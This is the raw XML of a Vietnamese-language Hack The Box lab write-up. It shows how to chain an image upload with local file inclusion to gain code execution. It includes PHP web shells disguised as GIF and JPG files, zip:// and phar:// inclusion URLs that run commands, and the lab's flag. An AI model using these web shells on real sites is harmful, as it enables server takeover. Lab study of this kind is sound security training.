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9075" w14:textId="7B4FBD45" w:rsidR="006F0C55" w:rsidRDefault="006F0C55" w:rsidP="006F0C55">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F0C55">
        <w:t xml:space="preserve">Use any of the techniques covered in this section to gain RCE and read the flag at </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E385674" w14:textId="5043260F" w:rsidR="006F0C55" w:rsidRDefault="006F0C55" w:rsidP="006F0C55">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B17DE39" wp14:editId="7A4B5C91">
            <wp:extent cx="5943600" cy="3729355"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="1079445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451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A42D" w14:textId="0534241F" w:rsidR="006F0C55" w:rsidRDefault="006F0C55" w:rsidP="006F0C55">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C5A75F4" wp14:editId="6A7BC424">
            <wp:extent cx="5943600" cy="1055370"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="81934515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5152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F083" w14:textId="7F5F768F" w:rsidR="006F0C55" w:rsidRDefault="006F0C55" w:rsidP="006F0C55">
      <w:r>
        <w:t>File tải nên được lưu tại đường dẫn /profile_images/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA03972" w14:textId="58F44126" w:rsidR="00C90D51" w:rsidRPr="00C90D51" w:rsidRDefault="00C90D51" w:rsidP="00C90D51">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C90D51">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>*Upload shell dạng gif</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4F7164" w14:textId="773DE1B9" w:rsidR="00C90D51" w:rsidRDefault="00C90D51" w:rsidP="006F0C55">
      <w:r>
        <w:t>Tại 1 file WebShell dưới dạng .gif</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE37823" w14:textId="3C538B29" w:rsidR="00C90D51" w:rsidRDefault="00C90D51" w:rsidP="006F0C55">
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BEFE01C" w14:textId="77777777" w:rsidR="00C90D51" w:rsidRPr="00C90D51" w:rsidRDefault="00C90D51" w:rsidP="00C90D51">
      <w:r w:rsidRPr="00C90D51">
        <w:t>echo 'GIF8&lt;?php system($_GET["cmd"]); ?&gt;' &gt; shell.gif</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037041AC" w14:textId="231A4650" w:rsidR="00C90D51" w:rsidRDefault="00C90D51" w:rsidP="006F0C55">
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103FC3E0" w14:textId="778F772D" w:rsidR="00816282" w:rsidRDefault="00816282" w:rsidP="006F0C55">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="55DBE219" wp14:editId="34650F88">
            <wp:extent cx="5800725" cy="1333500"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="17335701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7019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73A6" w14:textId="6ECCD7A7" w:rsidR="00595E0D" w:rsidRDefault="00816282" w:rsidP="006F0C55">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Upload thành công shell.gif</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C86DB62" w14:textId="3EAB8329" w:rsidR="00816282" w:rsidRDefault="00816282" w:rsidP="006F0C55">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="54D380C1" wp14:editId="6C43FE66">
            <wp:extent cx="5943600" cy="3755390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1975406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066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6002" w14:textId="3D8C4EB0" w:rsidR="00835997" w:rsidRDefault="00835997" w:rsidP="006F0C55">
      <w:r>
        <w:t>Xác định vị trí của shell.gif trên Website</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434F5C34" w14:textId="7AE3E833" w:rsidR="00835997" w:rsidRDefault="00835997" w:rsidP="006F0C55">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="144FE1A5" wp14:editId="499F2D9C">
            <wp:extent cx="5943600" cy="2718435"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="85825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20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0D14" w14:textId="586F78A8" w:rsidR="00835997" w:rsidRDefault="00835997" w:rsidP="006F0C55">
      <w:r>
        <w:t>Vị trí tại /profile_images/shell.gif</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C03A04" w14:textId="6ED914E3" w:rsidR="00835997" w:rsidRDefault="00835997" w:rsidP="006F0C55">
      <w:r>
        <w:t xml:space="preserve">Ta liệt kê các thư mục file tại đường dẫn / bằng shell.gif đã tải lên </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033E2C4F" w14:textId="54988D30" w:rsidR="007E0104" w:rsidRDefault="007E0104" w:rsidP="006F0C55">
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ADB3E37" w14:textId="5E5138A8" w:rsidR="007E0104" w:rsidRDefault="007E0104" w:rsidP="006F0C55">
      <w:r w:rsidRPr="007E0104">
        <w:t>/index.php?language=./profile_images/shell.gif&amp;cmd=ls+-l+/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688987FC" w14:textId="2F586785" w:rsidR="007E0104" w:rsidRDefault="007E0104" w:rsidP="006F0C55">
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E7E2DE" w14:textId="77777777" w:rsidR="00284884" w:rsidRDefault="007E0104" w:rsidP="006F0C55">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C1D905F" wp14:editId="2E2375B3">
            <wp:extent cx="5943600" cy="2583815"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="1825122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223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B71A" w14:textId="77777777" w:rsidR="00284884" w:rsidRDefault="00284884" w:rsidP="006F0C55">
      <w:r>
        <w:t xml:space="preserve">Ta tìm được file  *.txt ta đọc file và thu được flag </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFBEE28" w14:textId="4F0D4B5B" w:rsidR="007E0104" w:rsidRDefault="007E0104" w:rsidP="006F0C55">
      <w:r>
        <w:t>``</w:t>
      </w:r>
      <w:r w:rsidR="00F24288">
        <w:t>`bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD34D94" w14:textId="796FEF14" w:rsidR="005060EE" w:rsidRDefault="00F24288" w:rsidP="006F0C55">
      <w:r w:rsidRPr="00F24288">
        <w:t>/index.php?language=./profile_images/shell.gif&amp;cmd=cat+/2f40d853e2d4768d87da1c81772bae0a.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43CBC5B7" w14:textId="55FEB586" w:rsidR="00F24288" w:rsidRDefault="00F24288" w:rsidP="006F0C55">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9F2500" w14:textId="567398B2" w:rsidR="00284884" w:rsidRDefault="00284884" w:rsidP="006F0C55">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2BB5D6EE" wp14:editId="480A650F">
            <wp:extent cx="5943600" cy="1973580"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="938462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625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6976" w14:textId="14F9813B" w:rsidR="00284884" w:rsidRDefault="00284884" w:rsidP="006F0C55">
      <w:r>
        <w:t>P/s:</w:t>
      </w:r>
      <w:r w:rsidRPr="00284884">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00284884">
        <w:t>HTB{upl04d+lf!+3x3cut3=rc3}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F07814" w14:textId="1EF9FEE1" w:rsidR="00A00AA0" w:rsidRDefault="00A00AA0" w:rsidP="006F0C55">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00AA0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">Ta tải file shell zip lên website để xem có đọc được flag không </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F44C34" w14:textId="4EF857C9" w:rsidR="00A00AA0" w:rsidRPr="00A00AA0" w:rsidRDefault="00A00AA0" w:rsidP="006F0C55">
      <w:r>
        <w:t>Tạo 1 file jpg bên trong là 1 file php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3010C2EA" w14:textId="3F80074F" w:rsidR="00C90D51" w:rsidRDefault="00A00AA0" w:rsidP="006F0C55">
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D346DC" w14:textId="7636EF94" w:rsidR="00A00AA0" w:rsidRDefault="00A00AA0" w:rsidP="006F0C55">
      <w:r w:rsidRPr="00A00AA0">
        <w:t>echo '&lt;?php system($_GET["cmd"]); ?&gt;' &gt; shell.php &amp;&amp; zip shell.jpg shell.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8CCF3D" w14:textId="45F90005" w:rsidR="00A00AA0" w:rsidRDefault="00A00AA0" w:rsidP="006F0C55">
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5538F3C5" w14:textId="4682E733" w:rsidR="00A00AA0" w:rsidRDefault="00A00AA0" w:rsidP="006F0C55">
      <w:r>
        <w:t>Upload thành công file lên website</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5485047C" w14:textId="6AD4BCC6" w:rsidR="00A00AA0" w:rsidRDefault="00A00AA0" w:rsidP="00A00AA0">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E5AF3A2" wp14:editId="2BF01476">
            <wp:extent cx="3685309" cy="2375653"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="313423262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23262" name="Picture 1" descr="A screenshot of a vide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516" cy="23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FD39" w14:textId="77777777" w:rsidR="005060EE" w:rsidRDefault="005060EE" w:rsidP="005060EE"/>
    <w:p w14:paraId="1B269203" w14:textId="77777777" w:rsidR="005060EE" w:rsidRDefault="005060EE" w:rsidP="005060EE"/>
    <w:p w14:paraId="1AC2B1CF" w14:textId="07A43BB0" w:rsidR="005060EE" w:rsidRDefault="005060EE" w:rsidP="005060EE">
      <w:r>
        <w:t>Đọc flag.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D70C3F" w14:textId="31BC2ACC" w:rsidR="005060EE" w:rsidRDefault="005060EE" w:rsidP="005060EE">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F2A243" w14:textId="75CD0017" w:rsidR="005060EE" w:rsidRDefault="005060EE" w:rsidP="005060EE">
      <w:r w:rsidRPr="005060EE">
        <w:t>/index.php?language=zip://./profile_images/shell.jpg%23shell.php&amp;cmd=cat+/2f40d853e2d4768d87da1c81772bae0a.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A08240" w14:textId="6CD2527A" w:rsidR="005060EE" w:rsidRDefault="005060EE" w:rsidP="005060EE">
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B608B50" w14:textId="71768B94" w:rsidR="005060EE" w:rsidRDefault="005060EE" w:rsidP="005060EE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6BD5A21A" wp14:editId="6B24CB1C">
            <wp:extent cx="5943600" cy="1600200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="510527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278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998D" w14:textId="77777777" w:rsidR="00893018" w:rsidRPr="00893018" w:rsidRDefault="00893018" w:rsidP="00893018">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00893018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Phar Upload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A23BE88" w14:textId="01E21C2C" w:rsidR="00893018" w:rsidRDefault="00893018" w:rsidP="005060EE">
      <w:r>
        <w:t>Tạo file WebShell.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27825F21" w14:textId="7EB6B347" w:rsidR="00893018" w:rsidRDefault="00893018" w:rsidP="005060EE">
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14BE249B" w14:textId="77777777" w:rsidR="00893018" w:rsidRDefault="00893018" w:rsidP="00893018">
      <w:r>
        <w:t>&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8F17BD" w14:textId="77777777" w:rsidR="00893018" w:rsidRDefault="00893018" w:rsidP="00893018">
      <w:r>
        <w:t>$phar = new Phar('shell.phar');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558E87CC" w14:textId="77777777" w:rsidR="00893018" w:rsidRDefault="00893018" w:rsidP="00893018">
      <w:r>
        <w:t>$phar-&gt;startBuffering();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FC8AA7" w14:textId="77777777" w:rsidR="00893018" w:rsidRDefault="00893018" w:rsidP="00893018">
      <w:r>
        <w:t>$phar-&gt;addFromString('shell.txt', '&lt;?php system($_GET["cmd"]); ?&gt;');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6017F1" w14:textId="77777777" w:rsidR="00893018" w:rsidRDefault="00893018" w:rsidP="00893018">
      <w:r>
        <w:t>$phar-&gt;setStub('&lt;?php __HALT_COMPILER(); ?&gt;');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178321EA" w14:textId="77777777" w:rsidR="00893018" w:rsidRDefault="00893018" w:rsidP="00893018"/>
    <w:p w14:paraId="609AB58F" w14:textId="0451A32F" w:rsidR="00893018" w:rsidRDefault="00893018" w:rsidP="00893018">
      <w:r>
        <w:t>$phar-&gt;stopBuffering();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F4A842" w14:textId="0F113906" w:rsidR="00893018" w:rsidRDefault="00893018" w:rsidP="00893018">
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195773FD" w14:textId="40333D44" w:rsidR="00893018" w:rsidRDefault="00893018" w:rsidP="005060EE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08C222D6" wp14:editId="465B8E2E">
            <wp:extent cx="5943600" cy="2387600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="193261319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3190" name="Picture 1" descr="A computer code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F93D" w14:textId="30D44EE9" w:rsidR="00815E00" w:rsidRDefault="00815E00" w:rsidP="005060EE">
      <w:r w:rsidRPr="00815E00">
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidRPr="00815E00">
        <w:t xml:space="preserve">iên dịch nó thành một tệp phar và đổi tên nó thành </w:t>
      </w:r>
      <w:r w:rsidR="00F97F98">
        <w:t>WebS</w:t>
      </w:r>
      <w:r w:rsidRPr="00815E00">
        <w:t>hell.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22AA37AF" w14:textId="7E703750" w:rsidR="00C3066C" w:rsidRDefault="00C3066C" w:rsidP="005060EE">
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78064143" w14:textId="3B925DB9" w:rsidR="00F97F98" w:rsidRDefault="00F97F98" w:rsidP="005060EE">
      <w:r w:rsidRPr="00F97F98">
        <w:t>php --define phar.readonly=0 WebShell.php &amp;&amp; mv shell.phar WebShell.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71714E26" w14:textId="7FB9051E" w:rsidR="00C3066C" w:rsidRDefault="00C3066C" w:rsidP="005060EE">
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D2ED77" w14:textId="2F8624D2" w:rsidR="00F97F98" w:rsidRDefault="00F97F98" w:rsidP="005060EE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="483F6095" wp14:editId="7FABDFE3">
            <wp:extent cx="5943600" cy="971550"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2211075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0750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46E7" w14:textId="7ED9B55E" w:rsidR="007E7C32" w:rsidRDefault="007E7C32" w:rsidP="005060EE">
      <w:r>
        <w:t>Tải WebShell.jpg lên website :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569A76E4" w14:textId="105B1D6D" w:rsidR="007E7C32" w:rsidRDefault="007E7C32" w:rsidP="007E7C32">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12848A49" wp14:editId="79F8D62A">
            <wp:extent cx="4004019" cy="2583873"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="260136429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36429" name="Picture 1" descr="A screenshot of a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31" cy="25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E0A4" w14:textId="47C5BAF7" w:rsidR="007E7C32" w:rsidRDefault="007E7C32" w:rsidP="007E7C32">
      <w:r>
        <w:t>Đọc file flag bằng phar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A10F293" w14:textId="40CCCEC4" w:rsidR="007E7C32" w:rsidRDefault="007E7C32" w:rsidP="007E7C32">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059680F9" w14:textId="53A21C6D" w:rsidR="007E7C32" w:rsidRDefault="007E7C32" w:rsidP="007E7C32">
      <w:r w:rsidRPr="007E7C32">
        <w:t>/index.php?language=phar://./profile_images/WebShell.jpg%2Fshell.txt&amp;cmd=cat+/2f40d853e2d4768d87da1c81772bae0a.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09BC25CC" w14:textId="47A95F9C" w:rsidR="007E7C32" w:rsidRDefault="007E7C32" w:rsidP="007E7C32">
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B62FF72" w14:textId="6EB38495" w:rsidR="007E7C32" w:rsidRDefault="007E7C32" w:rsidP="007E7C32">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77F22BDB" wp14:editId="03F96D6A">
            <wp:extent cx="5943600" cy="1765300"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="123469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940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BC81" w14:textId="77777777" w:rsidR="00A00AA0" w:rsidRDefault="00A00AA0" w:rsidP="00A00AA0"/>
    <w:sectPr w:rsidR="00A0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C46DB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DE70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F2733"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="846E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07815">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="157164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50"/>
    <w:rsid w:val="00284884"/>
    <w:rsid w:val="005060EE"/>
    <w:rsid w:val="00595E0D"/>
    <w:rsid w:val="006F0C55"/>
    <w:rsid w:val="007E0104"/>
    <w:rsid w:val="007E7C32"/>
    <w:rsid w:val="00815E00"/>
    <w:rsid w:val="00816282"/>
    <w:rsid w:val="00835997"/>
    <w:rsid w:val="00893018"/>
    <w:rsid w:val="00A00AA0"/>
    <w:rsid w:val="00A90D10"/>
    <w:rsid w:val="00C3066C"/>
    <w:rsid w:val="00C90D51"/>
    <w:rsid w:val="00CF424C"/>
    <w:rsid w:val="00E27550"/>
    <w:rsid w:val="00F24288"/>
    <w:rsid w:val="00F9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20B6"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{21367EEE-278F-40AD-A9C1-11CD238E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17</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-02-02T05:50:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-02-02T07:04:00Z</dcterms:modified>
</cp:coreProperties>
</file>